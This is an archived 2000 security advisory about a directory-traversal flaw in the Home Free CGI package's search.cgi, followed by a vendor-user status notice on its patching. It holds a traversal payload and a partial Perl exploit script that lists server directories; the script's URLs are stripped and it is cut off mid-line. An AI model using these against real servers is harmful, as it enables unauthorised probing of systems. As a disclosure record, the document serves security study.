Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Apps :: search~1.txt Home Free CGI package search.cgi allows remote users to view directory listings on the server.

[ ]

k0ad k1d <>


    #!/bin/csh security advisory

           Title  :  Vulnerabilities in the
                     Home Free CGI package.

    Advisory Ref  :  csh-adv:04.01.2000-CGI-HomeFree-01

         Credits  :  fzx, omnihil, the guys in !el8
                     DSKZ, M0D


------------ is a vendor of Perl CGI scripts for all platforms that
support the language (WinNT, Linux, various Unix flavors). Home Free is a
package developed and marketed by, below is an extract
from their website.

     "Home Free is the ultimate community building program. Allowing you
      to give your visitors a free web site on your server. With complete
      control over every aspect of your free web site program, you can
      grow page views, revenue and brand awareness for your site."

Home Free is used by many popular websites. It allows users to set up and
maintain their websites through a series of CGI scripts without posing a
threat to system security.


Home Free consists of the following files from an end-user point of view :-


There are also various 'admin' CGI scripts in the package, such as :-


Vulnerabilities Identified


     The search.cgi script uses the following input variables :-

       letter=any string
       cata=any string
       perpage=any string
       start=any string

     This CGI script can be exploited to view directory listings on the host
     server. A vulnerability exists because of insufficient bounds checking
     of the 'letter' variable when it is parsed by the search.cgi script,
     for example :-\..\..\..\winnt

     The above URL will list the \winnt directory of the host. The
     script also seems to read and display the first line of each file
     (network.wri, et al). We have been unable to use the search.cgi script
     or any of the other scripts in the package to view files to date.

     If we had access to the source code of these Perl scripts, I'm sure
     many security problems would be identified.

     You can also exploit the vulnerability to view other directory
     such as the /cgi-bin directory under Apache.\..\..\..\apache\cgi-bin

     We also took the time in writing a short Perl script to display the
     directory listings of vulnerable servers :

     --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip

     # Quick exploit of the Home Free ./search.cgi script, allows you to
     # directories on the host.
     # Default server is antionline's, change as appropriate.

     use IO::Socket;

     if ($ARGV[0] eq "") { die "no argument\n"; }

     $asoc = IO::Socket::INET->new(Proto     => "tcp",
                                   PeerAddr  => "",
                                   PeerPort  => 80) ||
                     die "can't connect to host: $!";

     $| = 1;

     print $asoc "GET

     while(<$asoc>) {
             if ($_ =~ /.+HREF.+TD.+/) {
                     @parts = split("\"", $_);
                     $foo = $parts[1];
                     @parts = split("/", $foo);
                     print STDOUT $parts[3];
                     print STDOUT "\n";

     --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip

  Other smaller problems were identified when testing the bounds checking
  flexibility of the other scripts, such as user_manage.cgi. Without access
  the source code of the Perl scripts in question, it is very difficult to
  know the security implications of such problems. We'll leave that up to
  the vendor to look into and patch.


    #!/bin/csh security advisory

           Title  :  Vulnerabilities in the
                     Home Free CGI package.

    Advisory Ref  :  csh-adv:01.04.2000-CGI-HomeFree-01

         Credits  :  fzx, omnihil, the guys in !el8
                     DSKZ, M0D


AntiOnline Status Notice 
Tuesday, January 4, 2000 at 17:27:32
by John Vranesevich - Founder of AntiOnline 

As part of its policy on releasing any information related to the security of its network, AntiOnline presents the following

On Tuesday, the popular BugTraq security mail list released an advisory
about the security of "Home Free", a cgi software product produced by AntiOnline, along with hundreds of other websites, used
the HomeFree software in order to host free "user webpages" on its domain (which can be thought of as a geocities-like
interface). The security advisory used the AntiOnline instillation of
HomeFree as an example (we appreciate it) of the vulnerability.

The disclosed vulnerability allowed any user to view the structure of any
directory on the webserver. However, it did not allow any user to view the
contents of, delete, or otherwise modify any file on the server.

AntiOnline had the offending CGIs offline within 3 minutes of the BugTraq
notice being sent out (thanks to custom notification software implemented at

AntiOnline notified the makers of the HomeFree Software, and received a
patch from SolutionScript developer Tim Watson within 15 minutes. AntiOnline
is in the process of reviewing the patch, and the integrity of the other
CGIs in the HomeFree package.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH